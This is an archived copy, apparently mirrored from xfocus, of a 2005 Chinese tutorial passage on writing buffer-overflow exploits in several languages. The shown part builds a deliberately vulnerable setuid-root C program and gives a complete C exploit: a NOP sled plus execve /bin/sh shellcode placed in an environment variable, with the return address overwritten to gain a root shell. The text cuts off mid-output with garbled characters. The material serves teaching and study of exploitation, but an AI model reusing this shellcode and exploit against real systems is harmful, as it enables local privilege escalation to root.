📄 777.html

📁 里面收集的是发表在www.xfocus.org上的文章
💻 HTML
字号:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>溢出利用程序和编程语言大杂烩 </title>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<meta name="Keywords" content="安全焦点, xfocus, 陷阱网络, honeynet, honeypot, 调查取证, forensic, 入侵检测, intrusion detection, 无线安全, wireless security, 安全论坛, security forums, 安全工具, security tools, 攻击程序, exploits, 安全公告, security advisories, 安全漏洞, security vulnerabilities, 安全教程, security tutorials, 安全培训, security training, 安全帮助, security help, 安全标准, security standards, 安全代码, security code, 安全资源, security resources, 安全编程, security programming, 加密, cryptography,溢出  利用  perl  php  shell awk  vim  shellcode" />
<link rel="stylesheet" href="../../css/plone.css" type="text/css">
</head>

<body bgcolor="#FFFFFF" text="#000000">
<div class="top">
  <div class="searchBox">
    <form name="searchform" action="http://www.google.com/search" method="get">
      <input type="hidden" name="domains" value="www.xfocus.net">
      <input type="hidden" name="sitesearch" value="www.xfocus.net">
      <input type="text" name="q" size="20">
      <input type="submit" name="btnG" value="Google Search">
    </form>
  </div>
  <img src="../../images/logo.gif" border="0" width="180" height="80" alt="xfocus logo">
  <img src="../../images/title.gif" border="0" width="230" height="20" alt="xfocus title">
</div>
<div class="tabs">
  <a href="../../index.html" class="plain">首页</a>
  <a href="../../releases/index.html" class="plain">焦点原创</a>
  <a href="../../articles/index.html" class="selected">安全文摘</a>
  <a href="../../tools/index.html" class="plain">安全工具</a>
  <a href="../../vuls/index.html" class="plain">安全漏洞</a>
  <a href="../../projects/index.html" class="plain">焦点项目</a>
  <a href="https://www.xfocus.net/bbs/index.php?lang=cn" class="plain">焦点论坛</a>
  <a href="../../about/index.html" class="plain">关于我们</a>
</div>
<div class="personalBar">
  <a href='https://www.xfocus.net/php/add_article.php'>添加文章</a> <a href='http://www.xfocus.org/'>English Version</a>
</div>
<table class="columns">
  <tr>
    <td class="left">
<div class="box">
  <h5>&nbsp;文章分类&nbsp;</h5>
  <div class="body">
    <div class="content odd">
       <div style="white-space: nowrap;">
	    <img src='../../images/folder_icon.gif' border='0'> <a href='../../articles/4.html'><b>专题文章 <<</b></a><br><img src='../../images/folder_icon.gif' border='0'> <a href='../../articles/2.html'>漏洞分析</a><br><img src='../../images/folder_icon.gif' border='0'> <a href='../../articles/3.html'>安全配置</a><br><img src='../../images/folder_icon.gif' border='0'> <a href='../../articles/1.html'>黑客教学</a><br><img src='../../images/folder_icon.gif' border='0'> <a href='../../articles/5.html'>编程技术</a><br><img src='../../images/folder_icon.gif' border='0'> <a href='../../articles/7.html'>工具介绍</a><br><img src='../../images/folder_icon.gif' border='0'> <a href='../../articles/6.html'>火墙技术</a><br><img src='../../images/folder_icon.gif' border='0'> <a href='../../articles/8.html'>入侵检测</a><br><img src='../../images/folder_icon.gif' border='0'> <a href='../../articles/9.html'>破解专题</a><br><img src='../../images/folder_icon.gif' border='0'> <a href='../../articles/11.html'>焦点公告</a><br><img src='../../images/folder_icon.gif' border='0'> <a href='../../articles/12.html'>焦点峰会</a><br>
       </div>
	    
    </div>
  </div>
</div>

<div class="box">
  <h5>&nbsp;文章推荐&nbsp;</h5>
  <div class="body">
    <div class="content odd">
	    <img src='../../images/document_icon.gif' border='0'> <a href='../../articles/200408/733.html'>补丁管理最佳安全实践之资产评估</a><br><img src='../../images/document_icon.gif' border='0'> <a href='../../articles/200404/689.html'>国内网络安全风险评估市场与技术操作</a><br><img src='../../images/document_icon.gif' border='0'> <a href='../../articles/200410/743.html'>协作的信息系统风险评估</a><br>
    </div>
  </div>
</div>
	</td>
    <td class="main">
	  <h1>溢出利用程序和编程语言大杂烩</h1><br>创建时间：2005-03-02<br>文章属性：原创<br>文章提交：<a href='https://www.xfocus.net/bbs/index.php?lang=cn&act=Profile&do=03&MID=991'>watercloud</a> (watercloud_at_xfocus.org)<br><br>溢出利用程序和编程语言大杂烩<br />
<br />
<br />
<br />
<br />
溢出利用程序不仅仅是只能用c语言编写，其实几乎任何编程语言都能用来编写<br />
溢出利用程序，这里用Linux作为试验平台，以实例演示C、Perl、Shell、Awk<br />
语言编写溢出利用程序。之所以选择这几个语言是因为他们都几乎是Unix系统<br />
自带的语言（商用Unix系统中C语言例外）。示例中基本都是把SHELLCODE放到<br />
环境变量中来实现精确定位的。<br />
<br />
<br />
&lt;一&gt;&nbsp;&nbsp;有溢出漏洞的vul.c<br />
<br />
[cloud@test]$ id<br />
uid=505(cloud) gid=503(test) groups=503(test)<br />
[cloud@test]$ cat vul.c<br />
/* Demo <br />
&nbsp;&nbsp; Have a bof vul at argv[1].<br />
&nbsp;&nbsp; Write by watercloud @ xfocus.org <br />
*/<br />
#include&lt;stdio.h&gt;<br />
int main(int argc,char&nbsp;&nbsp;* argv[])<br />
{<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;char buff[32];<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if(argc &gt; 1)<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;strcpy(buff,argv[1]);<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;printf(&quot;buff : %s\n&quot;,buff);<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;return 0;<br />
}<br />
[cloud@test]$ gcc vul.c -o vul<br />
[cloud@test]$ ls -l vul<br />
-rwxr-xr-x&nbsp;&nbsp;&nbsp;&nbsp;1 cloud&nbsp;&nbsp;&nbsp;&nbsp;test&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;11627&nbsp;&nbsp;2月 24 10:14 vul<br />
[cloud@test]$ sudo chown root vul<br />
[cloud@test]$ sudo chmod u+s vul<br />
[cloud@test]$ ls -lh vul<br />
-rwsr-xr-x&nbsp;&nbsp;&nbsp;&nbsp;1 root&nbsp;&nbsp;&nbsp;&nbsp; test&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;11K&nbsp;&nbsp;2月 24 10:14 vul<br />
<br />
<br />
<br />
&lt;二&gt; C语言版本利用程序ex.c<br />
<br />
[cloud@test]$ cat ex.c<br />
/* Demo for exploit bof of &quot;./vul&quot; <br />
&nbsp;&nbsp; Write by watercloud @ xfocus.org <br />
*/<br />
#include &lt;stdio.h&gt;<br />
#define TARGET &quot;./vul&quot;<br />
#define ADDR 0xbffff3e8<br />
char SH[]=&quot;1\xc0PPP[YZ4\xd0\xcd\x80&quot;<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&quot;j\x0bX\x99Rhn/shh//biT[RSTY\xcd\x80&quot;;<br />
int main(int argc,char * argv[])<br />
{<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;char env_buff[4000];<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;char cmd_buff[1024];<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;int i,ret;<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;unsigned int *pi;<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;char * pc;<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;for(i=0;i&lt;3096;env_buff[i++]=0x90){ };<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;env_buff[i]=&#39;\0&#39;;<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;strcat(env_buff,SH);<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;setenv(&quot;KK&quot;,env_buff,1);<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;strcpy(cmd_buff,TARGET);<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;pc=&amp;cmd_buff[strlen(TARGET)];<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;*pc++=&#39; &#39;;<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;for(ret=1,i=0;i&lt;4 &amp;&amp; ret;i++)<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;int j;<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;*pc++=&#39;A&#39;;<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;pi=(unsigned int *)pc;<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;for(j=0;j&lt;20;*pi++=ADDR,j++){};<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;*pi=0;<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;ret=system(cmd_buff);<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;return ret;<br />
<br />
}<br />
[cloud@test]$ gcc ex.c -o ex<br />
[cloud@test]$ ./ex<br />
buff : A梵
💿 文件大小 601 K
👤 上传用户 lovely19891019
📂 所属分类其他
🏷️ 相关标签

#xfocus #www #org
⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -